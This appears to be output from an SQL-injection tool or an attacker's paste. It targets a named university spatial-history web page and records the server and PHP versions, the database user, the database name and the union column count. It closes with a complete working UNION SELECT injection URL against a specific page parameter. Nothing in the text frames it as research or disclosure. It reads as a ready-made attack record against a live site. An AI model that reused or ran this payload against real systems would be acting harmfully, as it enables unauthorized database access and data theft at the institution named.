Host Information

Server = Apache

Version = 5.1.45-1~bpo50+1-log

Powered by = PHP/5.2.6-1+lenny8

Attack Type = SQL Union Injection

Current User = gspatialhistory5@www04.Stanford.EDU

Current Database = g_spatialhistory_shwebsite

Supports Union = yes

Union Columns = 16

Vuln: http://www.stanford.edu/group/spatialhistory/cgi-bin/site/viz.php?id=121+and+1=0+ Union Select 1,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10,11,12,13,14,15,16